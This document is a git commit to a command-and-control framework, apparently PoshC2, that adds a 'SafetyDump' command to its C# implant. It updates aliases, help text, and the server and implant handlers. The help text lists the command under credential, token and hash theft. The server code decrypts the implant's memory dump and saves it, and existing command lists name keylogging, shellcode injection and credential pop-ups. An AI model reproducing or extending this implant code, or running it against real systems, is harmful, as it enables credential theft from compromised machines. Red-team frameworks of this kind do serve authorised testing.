Add SafetyDump to posh

2019-02-16 18:59:42 +00:00 · 2019-02-16 18:59:42 +00:00 · 7f33a21f09
parent c873312002
commit 7f33a21f09
5 changed files with 26 additions and 7 deletions
--- a/Alias.py
+++ b/Alias.py
@ -2,16 +2,17 @@

 # Powershell Implant
 ps_alias = [
-["s","get-screenshot"],
-["whoami","([Security.Principal.WindowsIdentity]::GetCurrent()).name"],
+    ["s","get-screenshot"],
+    ["whoami","([Security.Principal.WindowsIdentity]::GetCurrent()).name"],
 ]

 # Python Implant
 py_alias = [
-["s","get-screenshot"]
+    ["s","get-screenshot"]
 ]

 # C# Implant
 cs_alias = [
-["s","get-screenshot"]
+    ["s","get-screenshot"],
+    [ "safetydump", "run-exe SafetyDump.Program SafetyDump"]
 ]
--- a/C2Server.py
+++ b/C2Server.py
@ -338,7 +338,15 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
                except Exception as e:
                  update_task(taskId, "Error downloading file %s " % e)
                  print ("Error downloading file %s " % e)
-                
+
+              elif "safetydump" in executedCmd.lower():
+                  rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
+                  dumppath = "%sSafetyDump-Task-%s.bin" % (DownloadsDirectory, taskIdStr)
+                  open(dumppath, 'wb').write(base64.b64decode(rawoutput))
+                  message = "Dump written to: %s" % dumppath
+                  update_task(taskId, message)
+                  print (message) 
+
              else:
                update_task(taskId, outputParsed)
                print (Colours.GREEN)
--- a/Help.py
+++ b/Help.py
@ -67,6 +67,7 @@ help
 searchhelp listmodules
 label-implant <newlabel>
 back
+safetydump

 Migration
 ===========
@ -96,6 +97,11 @@ run-exe Seatbelt.Program Seatbelt SysmonConfig
 run-exe Seatbelt.Program Seatbelt PowerShellSettings
 run-exe Seatbelt.Program Seatbelt RegistryAutoRuns

+Credentials / Tokens / Local Hashes (Must be SYSTEM):
+=========================================================
+safetydump
+safetydump <pid>
+
 Network Tasks / Lateral Movement:
 ====================================
 loadmodule Rubeus.exe
@ -453,4 +459,4 @@ SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","mov
 "download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
 "testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
 "inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
-"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti"]
+"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", ["safetydump"]]
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@ -656,6 +656,10 @@ def runcommand(command, randomuri):
      elif "hide-implant" in command.lower():
        kill_implant(randomuri)

+      elif "safetydump" in command.lower():
+        check_module_loaded("SafetyDump.exe", randomuri, user)
+        new_task(command, user, randomuri)
+
      elif "inject-shellcode" in command.lower():
        params = re.compile("inject-shellcode", re.IGNORECASE)
        params = params.sub("", command)
--- a/changelog.txt
+++ b/changelog.txt
@ -2,7 +2,7 @@
 ==============
 Added Harmj0y's KeeThief to modules
 Added RastaMouse's Watson to modules
-
+Added SafetyDump

 4.8 (13/02/19)
 ==============